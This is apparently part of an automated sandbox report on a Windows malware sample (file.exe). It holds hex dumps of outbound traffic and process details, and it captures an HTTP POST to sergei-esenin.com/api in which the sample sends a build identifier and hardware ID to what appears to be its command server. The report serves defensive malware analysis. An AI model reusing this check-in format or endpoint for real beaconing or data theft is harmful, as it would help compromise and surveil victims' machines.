                                                                                                                                                                                2024-10-20 06:39:12 UTC15331OUTData Raw: b4 33 73 71 61 22 ed a6 7f d9 e0 7a b0 d6 ec d0 f6 cf 88 f0 3c 14 65 e6 89 14 ed d7 3e 87 19 4e b4 60 c7 f4 6f be aa 04 14 d0 5e 19 49 4b d8 56 89 a4 b5 3f 95 85 a9 2b 12 21 19 d7 8f 7e 05 ac 86 3e 17 2d d8 56 23 b6 8b 3f f9 3c ee 43 a2 81 e7 bf 10 fd 12 3b cf 10 0d 54 bb f9 5a fb e0 41 2e 58 6d a3 87 1f f4 c6 30 99 80 91 8a 0c 1b d2 ff 7b a2 18 a2 77 f8 30 42 ff 77 0b 57 3b 01 ba 38 de bd 24 e9 4f 9f 42 4b bb a3 00 b4 39 f5 47 1f fc eb c7 ea fa 80 59 19 44 e6 f1 9d 23 c4 83 e0 d9 2e d5 3f 1b ec d1 ae ce b5 3c 58 3b 08 2e 27 00 f3 8b 59 ba 58 e7 fb 4e 08 8f 2d cb 7c 04 7b c9 9d a0 5c 06 aa 99 fc 07 96 90 84 94 97 d2 81 36 d0 64 db 8a 65 99 c2 79 bf 25 c2 51 ab 4f 74 80 b3 20 83 cd f5 3d 08 2e da 4d 8c 5d 30 d4 65 89 a3 f7 21 39 82 e5 20 0d 6b 46 e5 5a b1
                                                                                                                                                                                Data Ascii: 3sqa"z<e>N`o^IKV?+!~>-V#?<C;TZA.Xm0{w0BwW;8$OBK9GYD#.?<X;.'YXN-|{\6dey%QOt =.M]0e!9 kFZ
                                                                                                                                                                                2024-10-20 06:39:12 UTC15331OUTData Raw: 31 b0 dc a9 8c 43 1c fa b1 15 99 4a 20 d2 27 77 ed 77 f3 cf d3 00 98 af 56 1e 27 31 bd 78 99 41 63 9f ca fd 1a cb 9a 14 e8 b3 12 aa 1b 4b cc a1 6b df 56 9d 0c 86 24 3b bf 75 a9 df ef 57 fa 6c 5a 2a 1c a4 c4 7b 9d 3c c1 e4 59 b6 90 f4 f6 d7 08 75 8d 2a fc a3 2d c3 53 e9 f1 89 a4 9d b9 29 89 15 1b de 8b f4 54 38 af b9 5a 6f 25 0b 6a 3a a4 4f 94 21 d1 b3 60 70 e5 c3 7a f9 d8 92 b0 11 be ee 69 9a f5 cb 10 59 48 95 22 17 a2 3e bf e1 64 4a e7 bd d8 40 dc 2a 1c 56 91 0f 0f 0f 27 f7 08 c3 70 29 2e 5b 3c 47 6c 8e 9e 81 7e cc fc 58 12 80 45 b3 0f c7 a8 07 9d cc c0 4d 4c 44 e8 47 b9 fd fd f3 cd 22 16 4c 19 35 4a 4c fc 60 78 18 70 b0 af 69 ef 19 d9 fc a6 50 57 16 60 04 f7 4d e5 bd 18 0f 03 2b b6 95 bd 72 18 ac 63 2c ee da 5f b2 c2 a6 23 d2 5c 12 1a 70 60 4a 1c 40 a0
                                                                                                                                                                                Data Ascii: 1CJ 'wwV'1xAcKkV$;uWlZ*{<Yu*-S)T8Zo%j:O!`pziYH">dJ@*V'p).[<Gl~XEMLDG"L5JL`xpiPW`M+rc,_#\p`J@
                                                                                                                                                                                2024-10-20 06:39:12 UTC15331OUTData Raw: 1b 26 b0 12 52 11 a0 09 31 24 c1 3f d1 62 ae 7a 9f f2 93 55 51 b3 bc 6d d6 08 e3 02 9d 18 b7 a7 6b 79 e2 2c ee 41 66 61 3f 36 d6 9b e5 62 38 44 d4 c0 1a 48 af e4 59 28 f6 2f 12 4b 9c e2 e1 f9 f0 57 4a 26 32 eb 77 a5 5f 81 8d c5 22 1f bf ee db a1 a8 d6 ab 68 22 06 7c e5 aa 7b e5 df 46 37 30 8f 90 85 e1 7a 84 90 37 1d d2 34 98 7a dc 14 b5 b2 5e 37 8e 6d 5c 8d 76 3d 24 06 b3 9f 37 1b a7 20 03 90 5e ac da a0 78 26 f1 28 c6 cd 71 30 84 83 c3 0b 6f 11 3e 83 3d d0 6c 2a 92 fe a4 80 18 a2 c7 42 5f d5 33 87 73 7f 97 32 8a 60 e6 32 36 d6 e3 79 25 28 01 9e 53 d7 2f 12 b3 59 f5 d8 a6 6e 4f 5a 0b a6 f3 35 54 35 2f eb e0 cd ca 0c e9 92 fb 29 58 58 6a 7d a0 0b 7b 64 09 40 ec 3f b5 f8 19 c4 4f b9 ed e9 26 23 30 5b 59 26 f1 c4 38 25 26 ce 0b 79 6a 36 ca cb ba 83 9e 40 a1
                                                                                                                                                                                Data Ascii: &R1$?bzUQmky,Afa?6b8DHY(/KWJ&2w_"h"|{F70z74z^7m\v=$7 ^x&(q0o>=l*B_3s2`26y%(S/YnOZ5T5/)XXj}{d@?O&#0[Y&8%&yj6@
                                                                                                                                                                                2024-10-20 06:39:12 UTC15331OUTData Raw: 80 05 67 f0 ab b3 d7 5d 24 e1 5b bf f4 c2 02 c2 5d 3e 4d 37 a4 a0 18 58 7e cc b5 e9 ab 9d 33 1a 19 9d ea 9f 7a ff cd f9 7d bd aa 96 1b 0a d6 89 64 12 83 04 93 25 66 bb a4 b6 6b d1 f7 77 d5 45 1d 73 8c e8 7b 12 4b b4 37 9c 4b 3b cb 5f 00 7c fd 59 b8 c8 0e 0c 0e fe 0b 7b 0f 01 c6 49 22 85 c4 77 78 a7 3e 62 f8 ba 55 d5 30 53 1e 11 54 23 00 4f 3f b9 ed c7 0f d4 f1 6a 37 f9 47 aa 49 15 03 ea 60 6a 07 7e 0a 07 96 be 42 70 5f 04 e3 c1 de 7b 1d ea 40 ed 26 d4 69 b3 fa 14 07 39 88 b8 f1 8a a2 ce 1d 3b 70 0a 4a c7 86 29 b6 fc f7 b9 ca fa 8f 8e b0 7c 31 1f fa de 50 d5 fb 6c f7 15 97 37 87 eb 72 25 20 b2 97 48 e7 6e 7a 1c ce 6c 62 64 6f 24 bc cc b8 5f b5 1f 24 3d 93 ba 75 05 cd 3e c8 67 9a ba f0 a3 92 a0 9c 7e 03 92 74 4b f3 5f 15 01 3d 63 f9 d1 54 10 26 2b 15 d0 b5
                                                                                                                                                                                Data Ascii: g]$[]>M7X~3z}d%fkwEs{K7K;_|Y{I"wx>bU0ST#O?j7GI`j~Bp_{@&i9;pJ)|1Pl7r% Hnzlbdo$_$=u>g~tK_=cT&+
                                                                                                                                                                                2024-10-20 06:39:12 UTC15331OUTData Raw: 07 f9 da 37 8a ff e9 ae ae 69 66 6f 43 f3 7f 50 a2 0b a7 0b 62 e5 92 e7 1b 92 34 33 cb f5 59 48 ed 99 1c 69 93 a4 54 5a 7c 09 2b 11 be 25 5d a6 a4 0a b5 ee 17 61 71 9a 49 ff 42 e1 42 eb af e3 18 4e 06 00 e2 ae d4 53 83 bc ce 52 17 bb a8 46 ae 80 b2 dc 70 e3 12 a0 b0 fe 87 0b 1a 37 03 1d 64 a1 4a 83 9e a5 ba f1 56 83 6f 4d bb 31 b0 d2 8d cf 07 78 60 97 3d 38 78 9f 65 8e 5a ff 3e 0c 8c 03 e0 f3 a2 c5 0f eb 1c a3 e9 fb 01 f8 dc 6b 67 61 fb ae e3 fb c1 56 da 79 0c 58 93 d3 bb d8 ab d4 48 c9 a9 80 77 ea 87 ef 69 f5 44 b1 82 08 d9 ad ae d8 88 19 a3 02 9b ad 0d 1f 73 c7 19 e5 03 81 08 d3 bf 80 ff bf 9b b6 66 4c 06 ff a7 a4 4a c5 e8 5d 22 c8 e8 92 27 6d 2d 74 1a 82 9d 20 36 e2 84 0a e5 a0 ce 65 e2 76 a4 2c c1 c1 b1 d0 de ad db 8c cd 23 97 9d dd 25 29 a7 c6 2d 76
                                                                                                                                                                                Data Ascii: 7ifoCPb43YHiTZ|+%]aqIBBNSRFp7dJVoM1x`=8xeZ>kgaVyXHwiDsfLJ]"'m-t 6ev,#%)-v
                                                                                                                                                                                2024-10-20 06:39:12 UTC15331OUTData Raw: ae d6 8a b6 f8 18 c9 74 c2 f5 7b 25 46 55 df 5e 54 ae 7b ed 1c dd 2d 95 8e b8 a9 ca c4 a8 e8 ef 49 e1 dd 59 b5 db 7f 93 ae af a0 15 b2 f1 ee 45 ec db ea 00 71 72 4d 1a 97 88 61 40 28 2b f6 dd e1 b8 ef 4c cd 91 7c 90 ea 91 a0 65 37 10 9d 6f 4d c4 d3 b3 ad a2 cf ff 85 6d 25 b2 e4 d1 f0 f5 ab 39 31 c6 34 53 44 ed fb 75 b2 cc 9e ab 7b aa ee 2c d9 0e c4 ac 9d 85 9e b6 4b ef 46 75 f5 51 75 f9 5c bd 71 37 2d 34 31 b0 a8 99 c7 4f 0b 03 92 a9 39 6d 6a 73 17 a1 37 db 87 16 db 58 f7 bc db 52 78 c2 0c 45 ad da cb 7a ee 92 0a 8a cb 6b 21 ce 14 9b 7f 15 1d 08 9c 0c e8 0b df b1 14 0a 34 d1 5e 8b 9f 35 f9 13 fd 2a 4f f3 73 b0 6c 45 51 8c cd c5 05 79 f5 40 7c 7f 8b 3f 7c 3d 0a 67 e6 41 59 de 60 1c 3c 55 70 8f 3c bc 4f 7f 37 e8 d2 d1 80 4e d2 72 4f 98 c6 98 01 62 c1 eb 3b
                                                                                                                                                                                Data Ascii: t{%FU^T{-IYEqrMa@(+L|e7oMm%914SDu{,KFuQu\q7-41O9mjs7XRxEzk!4^5*OslEQy@|?|=gAY`<Up<O7NrOb;
                                                                                                                                                                                2024-10-20 06:39:12 UTC15331OUTData Raw: 8b 82 0f e8 15 c2 5e af d4 7d 04 91 2f ef d7 02 3d d8 e8 3a 4f 1f 51 88 ac 47 2f b2 bf 1b 79 a1 5c 96 20 f4 f2 58 e3 9b d3 c7 ca c5 40 52 09 ea e8 61 59 7c ef 3b c0 c1 22 24 3a 05 cb 4d 76 f1 59 d2 d7 5b 4f bb 7c f8 61 61 06 ea 3e 9a ec 20 74 e7 87 15 08 4c 61 a4 11 36 c0 53 f4 f6 1f cd e1 27 5f 85 2e dc 6b 51 c7 cd 5c aa b9 f7 55 e8 98 0a 7a 03 cb b9 52 a2 ab fb b6 d9 6b b9 7d bf 87 82 2e 90 e5 fa b4 82 f6 f3 80 ac aa 3f e7 e0 86 a8 bf 3a 5e bf 76 47 66 06 c5 9c 8e 32 fd f7 26 b5 88 47 50 82 f5 13 fc b1 c2 6e 96 76 c5 0f 99 d3 d2 fe 9d 11 05 dd 9a 2a 6a 31 b5 ac ca 45 56 1a 1f 48 25 15 43 3c 1e 53 36 91 7b de 83 e2 5d 77 0f 73 45 08 96 32 73 dc a8 e6 8c 10 d4 20 40 a2 7d 3a d0 45 ed 2e 11 9e 11 e6 79 43 51 50 43 c6 73 15 c0 a1 44 ce 66 20 20 89 53 29 3c
                                                                                                                                                                                Data Ascii: ^}/=:OQG/y\ X@RaY|;"$:MvY[O|aa> tLa6S'_.kQ\UzRk}.?:^vGf2&GPnv*j1EVH%C<S6{]wsE2s @}:E.yCQPCsDf S)<
                                                                                                                                                                                2024-10-20 06:39:12 UTC15331OUTData Raw: 13 df 0c 9f 90 67 99 c1 d1 76 9c 69 5b b1 73 75 75 1a 2a 3e 3b 8b 85 88 b3 42 6d ed da 5e 04 4f 79 82 42 56 e4 68 ba 44 f8 9f 49 c1 5a a7 1f 2d 9a d9 df 5a b4 e8 1e bf 03 e5 bb 14 4d b7 36 9a 63 01 22 9f b2 cc 75 c2 9b a5 07 c3 b5 e5 6d af dc 4e d4 a2 d0 57 6d e3 94 49 84 6e 9e da a5 4f 04 d7 71 f9 64 98 aa 8f 00 37 d7 3a 4c e4 e9 f2 b0 bc 27 01 22 e4 10 c8 0a f1 c1 b2 ef 92 b7 eb c4 24 5d c3 f2 cf bd c3 40 0a 32 d4 e9 f5 71 c3 f6 77 4d 5e 58 e0 93 c8 9c f8 2c 6f 38 c9 95 c8 9f 32 1b 2c 8c 48 a4 c4 42 d3 bb ec 7e 9b 62 71 6a ef 35 bc 21 98 5e fa b1 82 9b c5 ee 96 fd 65 6a 5e b7 e9 49 e1 31 c5 13 e8 f7 95 7b 50 64 47 14 9c ff 1c 40 b9 a1 24 dd b5 a5 84 58 1e 5c b8 0a 6c 82 86 e1 1b 11 4f ac 0b 84 d9 01 72 3d 78 4f 77 aa 10 52 b1 9a 07 df 15 e8 be 0b 5c 39
                                                                                                                                                                                Data Ascii: gvi[suu*>;Bm^OyBVhDIZ-ZM6c"umNWmInOqd7:L'"$]@2qwM^X,o82,HB~bqj5!^ej^I1{PdG@$X\lOr=xOwR\9


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                8192.168.2.449739104.21.53.84437436C:\Users\user\Desktop\file.exe
                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                2024-10-20 06:39:17 UTC354OUTPOST /api HTTP/1.1
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Cookie: __cf_mw_byp=bKmBZVeXetEUsJEvqQWppTmgKdLdaxlDFkrWihgCGmQ-1729406342-0.0.1.1-/api
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                Content-Length: 87
                                                                                                                                                                                Host: sergei-esenin.com
                                                                                                                                                                                2024-10-20 06:39:17 UTC87OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e 64 61 72 79 79 26 6a 3d 26 68 77 69 64 3d 39 41 39 39 41 31 38 46 30 30 31 45 43 45 41 43 38 38 41 46 35 45 36 46 41 32 44 46 32 35 46 45
                                                                                                                                                                                Data Ascii: act=get_message&ver=4.0&lid=4SD0y4--legendaryy&j=&hwid=9A99A18F001ECEAC88AF5E6FA2DF25FE


                                                                                                                                                                                Statistics

                                                                                                                                                                                CPU Usage

                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                Memory Usage

                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                High Level Behavior Distribution

                                                                                                                                                                                Click to dive into process behavior distribution

                                                                                                                                                                                System Behavior

                                                                                                                                                                                General

                                                                                                                                                                                Target ID:0
                                                                                                                                                                                Start time:02:38:57
                                                                                                                                                                                Start date:20/10/2024
                                                                                                                                                                                Path:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                Commandline:"C:\Users\user\Desktop\file.exe"
                                                                                                                                                                                Imagebase:0x4d0000
                                                                                                                                                                                File size:3'058'688 bytes
                                                                                                                                                                                MD5 hash:AE7FDA647DF94FB9207204A517856151
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Has exited:true

                                                                                                                                                                                Disassembly

                                                                                                                                                                                No disassembly